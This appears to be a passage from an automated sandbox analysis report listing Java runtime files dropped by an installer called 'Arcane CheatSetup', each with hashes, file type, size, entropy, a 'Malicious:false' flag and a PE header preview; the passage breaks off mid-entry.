                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ar.:%..i%..i%..i,kKi'..i.]@i&..i>.Di&..i%..in..i>.Fi ..i>.ri8..i>.si,..i>.Bi$..i>.Ei$..iRich%..i........PE..L....DjW..........................................@..................................c....@..................................p..<....................V..@........... ...............................@6..@............q...............................text............................... ..`.rdata.............................@..@.data........P.......(..............@....idata..D....p.......8..............@....rsrc................B..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-RPV0O.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):160256
                                Entropy (8bit):6.469497559123052
                                Encrypted:false
                                SSDEEP:3072:a2lpElIhbyyH3c1CX766zKELxKvFaPSnjZqMNJlGle:a2rE+xdW+76DEVKv8wv
                                MD5:4E3C37A4DE0B5572D69AD79B7A388687
                                SHA1:6B274E166641F9CE0170E99FE2D1F4319B75A9E8
                                SHA-256:893A86E7B1DE81DEDAB4794732FCCD02790756A2DBE4815C102F039088DFCBD2
                                SHA-512:8352A1CD859D17A27560448C6FFB0E8200096CAC744C8BB56330397FDE0B7F702E2295999D89FBAD74DF72DF200C391113A23A9B4342ABAC738167967533F9CD
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d6.. We. We. We.;...9We.;...We.)/..)We. Wd..We.O!.(We.;...We.;...!We.;...!We.;...!We.Rich We.........................PE..L....HjW...........!.....r...........q....................................................@.............................Z.......d.... ..............................@...................................@............................................text....p.......r.................. ..`.rdata..jH.......J...v..............@..@.data...,3..........................@....rsrc........ ......................@..@.reloc..@............T..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-S4T07.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):574528
                                Entropy (8bit):6.508068830472597
                                Encrypted:false
                                SSDEEP:12288:NtKMEr1LBBgPcvhwhtRtL+tKJZetu4zxLukaMevlOjPMat4+8NMutQaLqqiINw3X:NtKMEr1VBgPcvhwhtRtL+tkZezxLuQeS
                                MD5:5E1B7D0ACCB4275DEAB6312AA246CB3E
                                SHA1:488A5CB9D9C0CF27824DF32B9B76D4F67F6FB485
                                SHA-256:9FC49B3F6FD11A2B2B92748C24F21721D1011B1920D092E38AF4021102125543
                                SHA-512:5A875DD4731E862F753EBB987593DC61D39DD3D3D13CDED284DE27DD09AFA946FA96824AC194EC0DD45AA2CE0D56637A5522F49F28F3C89B7F5248D389B1B62E
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y...8i.8i.8i.@..8i....8i.8h.8i....8i....8i.....8i....8i....8i....8i.Rich.8i.........PE..L...pPjW...........!...............................o.....................................@......................... ..."......<.......................@...........................................p...@............................................text............................... ..`.rdata..B...........................@..@.data...,...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-SGAAD.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15424
                                Entropy (8bit):6.380726588633652
                                Encrypted:false
                                SSDEEP:384:1Td3hw/L3kKLnYgIOGOOssnPV5Lnf6onYPLr7EbH:1zw/bkKLt7KnddnfPC7S
                                MD5:A46289384F76C2A41BA7251459849288
                                SHA1:4D8EF96EDBE07C8722FA24E4A5B96EBFA18BE2C4
                                SHA-256:728D64BC1FBF48D4968B1B93893F1B5DB88B052AB82202C6840BF7886A64017D
                                SHA-512:34D62BEB1FA7D8630F5562C1E48839CE9429FAEA980561E58076DF5F19755761454EEB882790EC1035C64C654FC1A8CD5EB46ECA12E2BC81449ACBB73296C9E8
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../x.W...w.W..W..W....s.W...u.W...@.W...A.W...p.W...q.W...v.W..Rich.W..........................PE..L...nPjW...........!......................... .....m.........................`.......9....@..........................'......|$..<....@...............$..@....P....... ..............................8#..@............ ...............................text............................... ..`.rdata..v.... ......................@..@.data...p....0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-T1J1I.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.474237923131844
                                Encrypted:false
                                SSDEEP:384:Gps45cnQ6DmSHhV8r0eeU4Szi6nYPLr70aG:Gpsnn4S/8rxeUvC7RG
                                MD5:9A4CF09834F086568DF469E3F670BF07
                                SHA1:594C4E0394475A6299C79E3A063C7D5AE49635F3
                                SHA-256:709E9E544434C52285A72F29AD6B99CE1E7668545F10AD385C87ABF34D2052BB
                                SHA-512:CD551E7944461F3288B880B9D161F19F97EB4599A3A46CC93C4172B5112960FB0C040B9996F13CF0761FB85A283E2F20944135EC59660C807A59B29CDDC44586
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......@....@.................................4#..P....@..T............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...T....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TH2Q9.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.413942547146628
                                Encrypted:false
                                SSDEEP:768:+HhfWinfwUFAvnb5TIUX+naSOu9MQQ5jhC7EY:cuin5FAvNTIUX+nbMQQ54EY
                                MD5:530D5597E565654D378F3C87654CCABA
                                SHA1:6FAC0866EE0E68149AC0A0D39097CEF8F93A5D9E
                                SHA-256:0CFAA99AE669DDC00BD59B5857F725DFF5D4C09834E143AB1B5C5F0B5801D13B
                                SHA-512:D7520A28C3054160FCD62C9D816A27266BE9333E00794434FB4529F0FF49A2B08E033B5E67A823E5C184EE2D19D7F615FF9EE643FE71C84011A7E5C03251F3B4
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..HI...I..JI...I..~I...I..GI...I...I..I...I...I..NI...I..II...IRich...I........PE..L....DjW.................0...,.......1.......@....@..................................<....@.................................dR..x....p...............`..@.......t....A...............................P..@............@..p............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-TJN2U.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):86592
                                Entropy (8bit):6.686302444148156
                                Encrypted:false
                                SSDEEP:1536:/QsPinZd9lmzFRQnJ9sSpkWgVenAe7C3xWxNO3A4:lPE9lEmtpkj7eqWxNCA4
                                MD5:5E6DDF7CF25FD493B8A1A769EF4C78F7
                                SHA1:42748051176B776467A31885BB2889C33B780F2D
                                SHA-256:B9BEACA57BFF23C953917C0B2037351EF3334E6A9DE447DCA6542FE5C815BF9F
                                SHA-512:C47F742F064B99E5B9C2BDEAC97472D9D8C9466C9071E9799AF79F820199D9B30B198C33EF635F07A972B77475AFEA9E7417AA6335D22A7380E7B0E552869C18
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!3.ueRr&eRr&eRr&...&gRr&eRs&ERr&h..&fRr&h..&oRr&h..&hRr&h..&gRr&.+.&nRr&.+.&dRr&h..&dRr&.+.&dRr&RicheRr&........PE..L...qPjW...........!................~..............o................................O.....@........................../..B...D4..<....p...............:..@.......\...................................0...@...............|............................text...4........................... ..`.rdata..*w.......x..................@..@.data...$....@....... ..............@..._RDATA.......`.......(..............@..@.rsrc........p.......0..............@..@.reloc..\............4..............@..B................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-U0SIJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):22592
                                Entropy (8bit):6.620820751411794
                                Encrypted:false
                                SSDEEP:384:YL4Z7lZRiY3PB6cGgOp2m1zq2oatSnPV5zYxkpLfsnYPLr7Ybc:E4PZRiY3PB6cVAebaMnd+ypLkC7Cc
                                MD5:700F5789D2E7B14B2F5DE9FDB755762E
                                SHA1:F35EDE3441D6E5461F507B65B78664A6C425E9AC
                                SHA-256:D115EAF96BD41C7A46400DCFF7EF26AC99E3CF7A55A354855C86BAE5C69A895A
                                SHA-512:664A442DD424CA04AC0CE072B9BBD5EF7C657B59A26403C44A856738F7998466BFE3010825A13451281841D39B0A34D8997EE24497D626EC60C19AA1AF0EE465
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../j.W...e.W..W..W....a.W...g.W...R.W...S.W...b.W...c.W...d.W..Rich.W..........PE..L...|PjW...........!........."......T&.......0.....m.................................O....@.........................`>.......:..<....`...............@..@....p.. ....0...............................9..@............0...............................text...^........................... ..`.rdata..p....0....... ..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VI3JJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.565433654691718
                                Encrypted:false
                                SSDEEP:768:a+BEJER/xSW/EoB8VBQZbKYawLysHFhIAqQbQMD8YpwQ+Qi4v8qUYVC7R:a+BEJERvQGbKnwusjIAq08YDi4UqUYoR
                                MD5:95EDB3CB2E2333C146A4DD489CE67CBD
                                SHA1:79013586A6E65E2E1F80E5CAF9E2AA15B7363F9A
                                SHA-256:96CF590BDDFD90086476E012D9F48A9A696EFC054852EF626B43D6D62E72AF31
                                SHA-512:AB671F1BCE915D748EE49518CC2A666A2715B329CAB4AB8F6B9A975C99C146BB095F7A4284CD2AAF4A5B4FCF4F939F54853AF3B3ACC4205F89ED2BA8A33BB553
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J!...@..@..@...@..@...u..@...B..@..@..@..8M..@...t..@...E..@...D..@...C..@.Rich.@.........PE..L...pPjW...........!.....V...Z......9_.......p.....o................................X.....@..............................+..L|..........................@.......t....r...............................{..@............p...............................text...TT.......V.................. ..`.rdata...F...p...H...Z..............@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-VNH60.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):70208
                                Entropy (8bit):6.353501201479367
                                Encrypted:false
                                SSDEEP:768:jFVfr2k521ZnrawwMmqPXt+rP3b/9/YMCxx0OpPOrEE14EVHLAuDeGJiqrmehiV9:PxioMmqF+2x0MORLVq7qjh3rmKPNpwGg
                                MD5:C2A59C7343D370BC57765896490331E5
                                SHA1:A50AF979E08A65EB370763A7F70CDB0E179D705D
                                SHA-256:40614FE8B91E01AD3562102E440BDBF5FAC5D9F7292C6B16A58F723BFFFE6066
                                SHA-512:CA266F1B2E51F66D119E2D71E3377C229A3D583853FFB606C101AFEB41689ACE7D1F1594781091DA67F9BE9D09F3019BF048C0F819777E8F1827A56BEEC252C4
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...1...1...1..9....1.j...1..9....1..9...1.....1...0.q.1.....1..9....1..9....1..9....1.Rich..1.................PE..L....HjW.................B...........B.......`....@..........................@......5C....@..................................}..x.......................@....0.......b...............................u..@............`......@{.......................text...,@.......B.................. ..`.rdata..x'...`...(...F..............@..@.data................n..............@....rsrc................p..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pcsc.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.490137326885244
                                Encrypted:false
                                SSDEEP:384:WCMJqfiSZzDonPV5TyVIbb8nYPLr7VblXT:WLJqrNkndQIsC7Vhj
                                MD5:1F004C428E01F8BEB07B52EB9659A661
                                SHA1:4D6AAB306CB1F4925890BF69FCDF32BBFE942B81
                                SHA-256:1BDEFECDF8CFA3F6DA606AD4D8BD98EC81E4A244D459A141723CCB9DC47E57CB
                                SHA-512:61888A778394950D2840E4D211196FFE1CB18FA45D092CBADBEDF2809BDED3D4421330CFE95392DD098E4AE3F6F8A3070E273FFCA2FB495C43C76332CA331DBF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.x^w.x^w.x^...^v.x^l..^u.x^l..^u.x^l..^u.x^~..^r.x^w.y^[.x^l..^y.x^l..^v.x^l..^v.x^l..^v.x^Richw.x^........PE..L...oPjW...........!.........................0.....m.........................p.......!....@..........................7.......2..P....P...............(..@....`..`....0..............................`1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\j2pkcs11.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.576803205025954
                                Encrypted:false
                                SSDEEP:1536:urOHh9t7/GAzqHcGxAARrZT9ixHDyo/r0rV9LrBH1bjPEwhEdheBwHWQFgE/XudL:G+9t7/qHcGHuy/pb
                                MD5:3A744B78C57CFADC772C6DE406B6B31E
                                SHA1:A89BF280453C0BCF8C987B351C168AEB3D7F7141
                                SHA-256:629393079539B1B9849704CE4757714D1CBE5C80E82C6BB3BC4445F4854EFA7B
                                SHA-512:506A147F33C09FA7338E0560F850E42139D0875EF48C297DDB3CC3A29F12822011915FACCB21DA908CF51A462F0EBA56B6B37C71D9C0F842BDE4A697FB4FFB64
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O^;w.?U$.?U$.?U$.G.$.?U$...$.?U$.?T$&?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$Rich.?U$........................PE..L...oPjW...........!.....v...8......l..............m................................O1....@.............................u...|...<.......................@.......................................... ...@............................................text...~t.......v.................. ..`.rdata...'.......(...z..............@..@.data...............................@....rsrc...............................@..@.reloc..V...........................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jaas_nt.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19520
                                Entropy (8bit):6.452867740862137
                                Encrypted:false
                                SSDEEP:384:45kF/QP8xkI6hgWIE0PVlyJSZ9nYPLr7+:4SqP7I6rkd4EfC7+
                                MD5:503275E515E3F2770A62D11E386EADBF
                                SHA1:C7BE65796AA0E490779F202C67EEC5E9FBB65113
                                SHA-256:97B5D1C8E7AAACE5C86A418CB7418D3B0BA4F5E178DE3CF1031029F7F36832AF
                                SHA-512:AC7C0CB626C2D821F0F4E392EE4E02C9E0093F019AA5B2947E0C7B3290A0098A3D9BB803AB44FD304CA1F1D272CFB7B775E3C75C72C7523FF7240F38440CFC3C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."..|fl./fl./fl./}.(/dl./}.*/gl./}../dl./o.'/al./fl./_l./}../kl./}.//gl./}../gl./}.)/gl./Richfl./................PE..L...pPjW...........!.........................0.....m.........................p............@..........................=.......8..d....P...............4..@....`..\....1...............................6..@............0...............................text............................... ..`.rdata..w....0......................@..@.data...`....@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jabswitch.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.413942547146628
                                Encrypted:false
                                SSDEEP:768:+HhfWinfwUFAvnb5TIUX+naSOu9MQQ5jhC7EY:cuin5FAvNTIUX+nbMQQ54EY
                                MD5:530D5597E565654D378F3C87654CCABA
                                SHA1:6FAC0866EE0E68149AC0A0D39097CEF8F93A5D9E
                                SHA-256:0CFAA99AE669DDC00BD59B5857F725DFF5D4C09834E143AB1B5C5F0B5801D13B
                                SHA-512:D7520A28C3054160FCD62C9D816A27266BE9333E00794434FB4529F0FF49A2B08E033B5E67A823E5C184EE2D19D7F615FF9EE643FE71C84011A7E5C03251F3B4
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I...I...I..HI...I..JI...I..~I...I..GI...I...I..I...I...I..NI...I..II...IRich...I........PE..L....DjW.................0...,.......1.......@....@..................................<....@.................................dR..x....p...............`..@.......t....A...............................P..@............@..p............................text............0.................. ..`.rdata.......@.......4..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\java-rmi.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466457942735197
                                Encrypted:false
                                SSDEEP:384:GpsbHnDiW6gejmSHhV8cGees7snYPLr7Wj53:GpsbHn/HS/8cresgC743
                                MD5:CF2F023D2B5F0BFB2ECF8AEEA7C51481
                                SHA1:6EB867B1AC656A0FC363DFAE4E2D582606D100FB
                                SHA-256:355366D0C7D7406E2319C90DF2080C0FAE72D9D54E4563C48A09F55CA68D6B0C
                                SHA-512:A2041925039238235ADC5FE8A9B818DFF577C6EA3C55A0DE08DA3DEDD8CD50DC240432BA1A0AEA5E8830DCDCCD3BFBF9CF8A4F21E9B56DC839E074E156FC008D
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW..................................... ....@..........................`......B.....@..................................#..P....@..\............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\java.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126528
                                Entropy (8bit):6.8082748642937725
                                Encrypted:false
                                SSDEEP:3072:Kw2b3Kr+uWU9XzFhziJ1TBZAhsIn/B9NZwMgjeNXLD:43KFFheLCBpV/
                                MD5:73BD0B62B158C5A8D0CE92064600620D
                                SHA1:63C74250C17F75FE6356B649C484AD5936C3E871
                                SHA-256:E7B870DEB08BC864FA7FD4DEC67CEF15896FE802FAFB3009E1B7724625D7DA30
                                SHA-512:EBA1CF977365446B35740471882C5209773A313DE653404A8D603245417D32A4E9F23E3B6CD85721143D2F9A0E46ED330C3D8BA8C24AEE390D137F9B5CD68D8F
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..r..r..r.W.r..r.W(r..r...r..r..(r..r...r..r.W.r..r..r..r.W)r..r.W.r..r.W.r..r.W.r..rRich..r................PE..L...qPjW...........!..... ...........(.......0.....m................................6N....@......................... u...B...U..........................@............5...............................S..@............0......<U..@....................text...b........ .................. ..`.rdata.......0.......$..............@..@.data...............................@....rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\java.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191040
                                Entropy (8bit):6.75061028420578
                                Encrypted:false
                                SSDEEP:3072:iUJiEoGLsncZizZQ7QBdCPdG3TBfMzrjZqMNGSplN2:iUJsnVzy7QBdC1G3TBEvFp6
                                MD5:E3E51A21B00CDDE757E4247257AA7891
                                SHA1:7F9E30153F1DF738179FFF084FCDBC4DAE697D18
                                SHA-256:7E92648B919932C0FBFE56E9645D785D9E18F4A608DF06E7C0E84F7CB7401B54
                                SHA-512:FC2981A1C4B2A1A3E7B28F7BF2BE44B0B6435FD43F085120946778F5C2C2CA73AD179796DEC0B92F0C6C8F6B63DD329EECC0AF1BB15392364C209DCF9CD6F7CA
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+H..E...E...E.L.....E..E....E..E....E......E...D...E..E..{.E..E....E..E....E.Rich..E.........PE..L....DjW.....................&....................@..........................0......aN....@.................................L*..d.......................@............................................$..@............................................text...~........................... ..`.rdata...s.......t..................@..@.data....4...@....... ..............@....rsrc................6..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\java_crw_demo.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):23616
                                Entropy (8bit):6.620094371728742
                                Encrypted:false
                                SSDEEP:384:Qp2dG5pC/ujTc8ZrEnrZm8WXLFnPV52WZQAnYPLr7lOGa:uvCGjJ0Q9ndRZdC71a
                                MD5:1C47DD47EBD106C9E2279C7FCB576833
                                SHA1:3BA9B89D9B265D8CEC6B5D6F80F7A28D2030A2D1
                                SHA-256:58914AD5737F2DD3D50418A89ABBB7B30A0BD8C340A1975197EEA02B9E4F25B2
                                SHA-512:091F50B2E621ED80BAFE2541421906DE1BCC35A0E912055B93E40CD903BE8B474103C0D8FECDF46E7F2F3C44BDADE64A857AB2B9CB5404306055150EE4ED002A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..v...v...v.....+.t...m'$.u...v...\...m'&.w...m'..t...m'..{...m'#.w...m'".w...m'%.w...Richv...................PE..L...wPjW...........!.....*...........4.......@.....m................................F.....@..........................I..|....E..<....`...............D..@....p.......@...............................D..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(....P.......:..............@....rsrc........`.......<..............@..@.reloc..^....p.......@..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.cpl (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):160256
                                Entropy (8bit):6.469497559123052
                                Encrypted:false
                                SSDEEP:3072:a2lpElIhbyyH3c1CX766zKELxKvFaPSnjZqMNJlGle:a2rE+xdW+76DEVKv8wv
                                MD5:4E3C37A4DE0B5572D69AD79B7A388687
                                SHA1:6B274E166641F9CE0170E99FE2D1F4319B75A9E8
                                SHA-256:893A86E7B1DE81DEDAB4794732FCCD02790756A2DBE4815C102F039088DFCBD2
                                SHA-512:8352A1CD859D17A27560448C6FFB0E8200096CAC744C8BB56330397FDE0B7F702E2295999D89FBAD74DF72DF200C391113A23A9B4342ABAC738167967533F9CD
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d6.. We. We. We.;...9We.;...We.)/..)We. Wd..We.O!.(We.;...We.;...!We.;...!We.;...!We.Rich We.........................PE..L....HjW...........!.....r...........q....................................................@.............................Z.......d.... ..............................@...................................@............................................text....p.......r.................. ..`.rdata..jH.......J...v..............@..@.data...,3..........................@....rsrc........ ......................@..@.reloc..@............T..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):70208
                                Entropy (8bit):6.353501201479367
                                Encrypted:false
                                SSDEEP:768:jFVfr2k521ZnrawwMmqPXt+rP3b/9/YMCxx0OpPOrEE14EVHLAuDeGJiqrmehiV9:PxioMmqF+2x0MORLVq7qjh3rmKPNpwGg
                                MD5:C2A59C7343D370BC57765896490331E5
                                SHA1:A50AF979E08A65EB370763A7F70CDB0E179D705D
                                SHA-256:40614FE8B91E01AD3562102E440BDBF5FAC5D9F7292C6B16A58F723BFFFE6066
                                SHA-512:CA266F1B2E51F66D119E2D71E3377C229A3D583853FFB606C101AFEB41689ACE7D1F1594781091DA67F9BE9D09F3019BF048C0F819777E8F1827A56BEEC252C4
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...1...1...1..9....1.j...1..9....1..9...1.....1...0.q.1.....1..9....1..9....1..9....1.Rich..1.................PE..L....HjW.................B...........B.......`....@..........................@......5C....@..................................}..x.......................@....0.......b...............................u..@............`......@{.......................text...,@.......B.................. ..`.rdata..x'...`...(...F..............@..@.data................n..............@....rsrc................p..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):57408
                                Entropy (8bit):6.6711491011490285
                                Encrypted:false
                                SSDEEP:1536:f6arRmcnq2lxm+Na6C7HIT6T8E2pLSSm3:fzm+q7HITS8E2pLSSA
                                MD5:AEADA06201BB8F5416D5F934AAA29C87
                                SHA1:35BB59FEBE946FB869E5DA6500AB3C32985D3930
                                SHA-256:F8F0B1E283FD94BD87ABCA162E41AFB36DA219386B87B0F6A7E880E99073BDA3
                                SHA-512:89BAD9D1115D030B98E49469275872FFF52D8E394FE3F240282696CF31BCCF0B87FF5A0E9A697A05BEFCFE9B24772D65ED73C5DBD168EED111700CAAD5808A78
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................I2.......(.......*.....................\.:.....\.>...............................)...............+.....Rich............PE..L...tPjW...........!.....r...V.......w.............m......................................@.........................@...x...............................@.......8.......................................@...............4............................text....p.......r.................. ..`.rdata...@.......B...v..............@..@.data...............................@....rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):446528
                                Entropy (8bit):6.603555069382601
                                Encrypted:false
                                SSDEEP:12288:RreTVhY4gXwLR4YS+OX3kQg4O5kM2LY58gwDTxXvwGSelo:Rr4VhyK7eTxXvwelo
                                MD5:8AE40822B18B10494527CA3842F821D9
                                SHA1:202DFFA7541AD0FAD4F0D30CEE8C13591DCA5271
